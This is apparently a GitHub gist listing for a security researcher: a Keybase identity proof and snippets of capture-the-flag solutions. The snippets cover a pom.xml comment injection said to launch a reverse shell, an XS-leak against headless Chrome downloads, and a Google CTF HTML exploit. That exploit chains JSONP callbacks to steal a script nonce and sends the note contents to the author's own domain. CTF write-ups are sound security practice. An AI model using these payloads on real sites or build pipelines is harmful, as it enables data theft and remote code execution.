🚩
Trying harder

s1r1us msrkp

msrkp / keybase.md

Keybase proof

I hereby claim:

  • I am msrkp on github.
  • I am s1r1us (https://keybase.io/s1r1us) on keybase.
  • I have a public key whose fingerprint is 00AD 378C CEB2 0955 8E61 4EED 5386 F2DB 6741 F532

To claim this, I am signing this object:

msrkp / sol.md
Last active May 16, 2021
OMH CTF Solutions

code_review solution

Add a comment in the text node of the plugin configuration in the pom.xml file. This comment adds a new plugin and executes a reverse shell.

<plugin>
    <groupId>org.apache.maven.plugins</groupId>
    <artifactId>maven-surefire-plugin</artifactId>
    <version>2.22.2</version>
    <configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
<plugin>
    org.codehaus.mojo
msrkp / exp.md
Last active Mar 22, 2021
LineCTF - Your Note script to perform XS-leaks to read the flag.

XS-leaks while downloading in headless Chrome.

TL;DR

There is a search feature for the notes and a download option, so visiting http://34.84.72.167/search?q=LINECTF{&download downloads a JSON file if the value of the q parameter exists in the notes.

Downloads don't work in headless Chrome, so it throws an error.

oracle

page.goto(url).then(() => {
msrkp / exp.html
Created Aug 24, 2020
Google CTF All the Little Things solution
<!DOCTYPE html>
<html>
<head>
<script>
x= `
<iframe name=x title='fetch(&#x22;/note&#x22;).then(x=>x.text()).then(x=>top.location=&#x22;//ctf.s1r1us.ninja?html=&#x22;+btoa(encodeURIComponent(x)))' id=y srcdoc='<script><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.nonce=top.document.body.lastElementChild.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.nonce=top.x.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.innerHTML=top.y.title.valueOf ><\/script>'></iframe>